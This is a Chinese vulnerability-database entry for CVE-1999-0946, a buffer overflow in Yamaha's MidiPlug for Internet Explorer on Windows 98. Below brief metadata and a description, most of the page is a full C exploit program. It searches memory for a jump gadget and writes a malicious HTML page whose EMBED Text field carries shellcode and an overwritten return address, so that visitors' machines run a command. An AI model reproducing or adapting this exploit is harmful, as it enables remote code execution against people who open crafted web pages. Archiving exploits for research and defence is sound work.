Microsoft IE Yamaha MidiPlug缓冲区溢出漏洞
漏洞ID | 1105587 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 1999-11-02 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-1999-0946 |
CNNVD-ID | CNNVD-199911-009 |
漏洞平台 | Windows | CVSS评分 | 5.1 |
|漏洞来源
|漏洞详情
YamahaMidiPlug中存在缓冲区溢出漏洞。通过EMBED标签中的Text变量产生该漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/760/info
There is a buffer overflow in the MidiPlug that may allow arbitrary code to be executed on the local host. This overflow occurs if a long "Text" variable is specified within an EMBED tag in a web page. Instructions in the text variable may be executed when a user visits the malicious web page.
/*=============================================================================
YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN ([email protected])
=============================================================================
*/
#include <stdio.h>
#include <windows.h>
#define MAXBUF 700
#define RETADR 256
unsigned int mems[]={
0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,0xbff20000,0xbff47000,
0xbff50000,0xbff61000,0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,0,0};
unsigned char exploit_code[200]={
0x90,0xEB,0x50,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x90,0x88,0x23,0xB8,0x50,0x57,0xF7,0xBF,0x80,
0xc4,0x20,0xFF,0xD0,0x43,0x90,0xB2,0xE0,0x90,0x28,
0x13,0x28,0x53,0x01,0x28,0x53,0x02,0x28,0x53,0x03,
0x28,0x53,0x04,0x28,0x53,0x05,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x90,0x88,0x23,0xB8,0x28,0x4E,0xF7,
0xBF,0x80,0xc4,0x20,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x90,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x90,0xEB,0xFD,0xE8,0xAB,0xFF,0xFF,0xFF,0x00
};
unsigned char cmdbuf[200]="MSVCRT.DLL.SYSTEM.WELCOME.EXE";
unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
unsigned char c1,unsigned char c2)
{
unsigned char *p;
unsigned int adr;
for (p=st;p<ed;p++)
if (*p==c1 && *(p+1)==c2){
adr=(unsigned int)p;
if ((adr&0xff)==0) continue;
if (((adr>>8)&0xff)==0) continue;
if (((adr>>16)&0xff)==0) continue;
if (((adr>>24)&0xff)==0) continue;
return(adr);
}
return(0);
}
main(int argc,char *argv[])
{
FILE *fp;
unsigned int i,ip;
unsigned char buf[MAXBUF];
if (argc<2){
printf("usage %s output_htmlfilen",argv[0]);
exit(1);
}
if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;
fprintf(fp,"<HTML><EMBEDnTYPE="audio/midi"nWIDTH=150nHEIGHT=40nAUTOSTART=TRUEnTEXT="");
for (i=0;;i+=2){
if (mems[i]==0){
printf("Can not find jmp code.n");
exit(1);
}
if ((ip=search_mem(fp,(unsigned char *)mems[i],
(unsigned char *)mems[i+1],0xff,0xe0))!=0) break;
}
printf("Jumping address : %xn",ip);
memset(buf,0x90,MAXBUF);
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strcat(exploit_code,cmdbuf);
memcpy(buf,exploit_code,strlen(exploit_code));
buf[MAXBUF]=0;
fprintf(fp,"%s"n>n</HTML>",buf);
fclose(fp);
printf("%s created.n",argv[1]);
return FALSE;
}
|参考资料
来源:BID
名称:760
链接:http://www.securityfocus.com/bid/760
来源:BUGTRAQ
名称:19991102SomeholesforWin/UNIXsoftwares
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=94157187815629&w;=2
相关推荐: PHP 4.x – DLOpen Memory Disclosure (2)
PHP 4.x – DLOpen Memory Disclosure (2) 漏洞ID 1054097 漏洞类型 发布时间 2003-08-13 更新时间 2003-08-13 CVE编号 N/A CNNVD-ID N/A 漏洞平台 PHP CVSS评分 N/…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666